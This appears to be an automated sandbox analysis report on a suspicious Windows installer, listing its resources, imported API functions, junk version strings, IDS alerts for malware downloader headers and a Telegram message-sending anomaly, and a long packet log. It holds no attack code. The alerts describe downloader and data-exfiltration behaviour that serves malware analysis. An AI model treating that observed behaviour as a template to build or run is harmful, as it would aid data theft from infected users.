RT_ICON | 0x4d0c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.7095375722543352
RT_ICON | 0x4d630 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.6879432624113475
RT_ICON | 0x4da98 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.5551075268817204
RT_ICON | 0x4dd80 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 0 | English | United States | 0.6086065573770492
RT_ICON | 0x4df68 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.6993243243243243
RT_DIALOG | 0x4e090 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x4e190 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x4e2b0 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x4e378 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x4e3d8 | 0xbc | data | English | United States | 0.601063829787234
RT_VERSION | 0x4e498 | 0x2b0 | data | English | United States | 0.5058139534883721
RT_MANIFEST | 0x4e748 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
KERNEL32.dll | GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
Description | Data
Comments | forskningslederen phon
CompanyName | influenzaepidemiens doktoren
FileVersion | 2.4.0.0
InternalName | nadvergst.exe
LegalCopyright | bimahs weensier spildevandsledningernes
LegalTrademarks | intensiveringernes
Translation | 0x0409 0x04e4
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-02-25T08:27:35.888216+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49770 | 172.217.18.14 | 443 | TCP
2025-02-25T08:27:41.175108+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP
2025-02-25T08:27:42.581340+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP
2025-02-25T08:27:43.138773+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49828 | 104.21.96.1 | 443 | TCP
2025-02-25T08:27:43.800116+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49830 | 158.101.44.242 | 80 | TCP
2025-02-25T08:27:45.588203+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49848 | 104.21.96.1 | 443 | TCP
2025-02-25T08:27:46.775686+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49855 | 104.21.96.1 | 443 | TCP
2025-02-25T08:27:53.628181+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49905 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 25, 2025 08:27:34.700143099 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:34.700206995 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4
Feb 25, 2025 08:27:34.704026937 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:34.791857958 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:34.791884899 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4
Feb 25, 2025 08:27:35.462557077 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4
Feb 25, 2025 08:27:35.462738037 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:35.463373899 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4
Feb 25, 2025 08:27:35.463435888 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:35.511449099 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:35.511483908 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4
Feb 25, 2025 08:27:35.511815071 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4
Feb 25, 2025 08:27:35.511872053 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:35.515499115 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:35.559334040 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4
Feb 25, 2025 08:27:35.888216019 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4
Feb 25, 2025 08:27:35.888287067 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:35.888299942 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4
Feb 25, 2025 08:27:35.888336897 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:35.888556004 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:35.888587952 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4
Feb 25, 2025 08:27:35.888632059 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14
Feb 25, 2025 08:27:35.932171106 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
Feb 25, 2025 08:27:35.932220936 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4
Feb 25, 2025 08:27:35.932405949 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
Feb 25, 2025 08:27:35.932883978 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
Feb 25, 2025 08:27:35.932897091 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4
Feb 25, 2025 08:27:36.594932079 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4
Feb 25, 2025 08:27:36.595026016 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
Feb 25, 2025 08:27:36.599673033 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
Feb 25, 2025 08:27:36.599705935 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4
Feb 25, 2025 08:27:36.599997044 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4
Feb 25, 2025 08:27:36.600052118 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
Feb 25, 2025 08:27:36.607388020 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
Feb 25, 2025 08:27:36.651338100 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4
Feb 25, 2025 08:27:39.311794043 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4
Feb 25, 2025 08:27:39.311968088 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
Feb 25, 2025 08:27:39.312279940 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4
Feb 25, 2025 08:27:39.312340975 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
Feb 25, 2025 08:27:39.326678038 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4
Feb 25, 2025 08:27:39.326780081 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
Feb 25, 2025 08:27:39.326793909 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4
Feb 25, 2025 08:27:39.326833010 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
Feb 25, 2025 08:27:39.400381088 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4
Feb 25, 2025 08:27:39.400496960 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.400513887 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.400568962 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.400624037 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.400679111 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.400758028 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.400827885 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.400840044 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.400930882 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.406708002 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.406764984 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.406778097 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.406862020 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.413311958 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.413439035 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.413450956 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.413589954 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.419622898 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.419719934 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.419738054 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.419776917 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.425885916 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.426039934 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.426053047 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.426134109 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.431380987 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.431472063 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.431479931 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.431596041 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.437306881 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.437407970 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.437414885 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.437470913 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.442603111 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.442713976 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.442719936 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.442806959 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.448193073 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.448271990 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.448328972 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.448451996 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.453943014 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.454024076 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.454056978 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.454138994 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.459909916 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.459996939 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489398003 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489479065 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489510059 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489604950 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489614010 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489672899 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489681005 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489726067 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489744902 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489794016 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489835024 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489886999 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489918947 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489964962 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.492250919 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.492337942 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.495625973 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.495759010 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.497529984 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.497601032 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.497612000 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.497665882 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.503490925 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.503552914 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.503587008 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.503638983 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.503671885 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.503712893 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.508765936 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.508841991 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.508851051 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.508914948 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.514688015 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.514746904 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.514754057 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.514828920 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.520066977 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.520136118 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.520145893 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.520253897 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.525652885 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.525723934 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.525757074 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.525801897 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.531481028 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.531614065 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.531627893 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.531708956 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.537281036 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.537945986 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.537976027 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.538068056 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.542052984 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.542149067 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.542165041 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.542215109 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.546552896 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.546647072 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.546669960 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.546741962 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.550940990 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.551018953 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.551079988 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.551136017 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.555244923 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.555341959 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.555392027 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.555550098 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.559237957 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.559324026 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.559350967 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.559413910 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.559437037 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.559499979 CET49781443192.168.2.4142.250.185.193
Feb 25, 2025 08:27:39.559521914 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.559577942 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.563487053 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.563622952 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.563638926 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.563699007 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.567259073 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.567311049 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.567365885 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.567451954 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.580547094 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.580727100 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.580780983 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.580781937 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.580804110 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.580857038 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.580862999 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.580899954 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.580904961 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.581022024 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.581027031 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.581073046 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.581197023 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.581437111 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.581444979 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.581568956 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.583591938 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.583676100 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.583688974 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.583729029 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.585853100 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.585921049 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.585942984 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.586050034 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.588160992 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.588222980 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.588243961 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.588296890 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.590528965 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.590617895 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.590630054 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.590759993 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.592729092 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.592796087 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.592812061 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.592946053 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.595056057 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.595128059 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.595160007 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.595202923 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.597393036 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.597476006 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.597486019 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.597541094 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.599699974 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.599833965 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.599852085 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.599973917 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.602025032 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.602174997 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.602183104 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.602237940 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.604327917 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.604391098 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.604425907 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.604482889 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.606527090 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.606686115 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.606702089 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.606754065 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.608891010 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.608956099 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.608963966 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.609005928 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.611249924 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.611301899 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.611325979 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.611411095 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.613493919 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.613549948 CET  49781  443  192.168.2.4  142.250.185.193
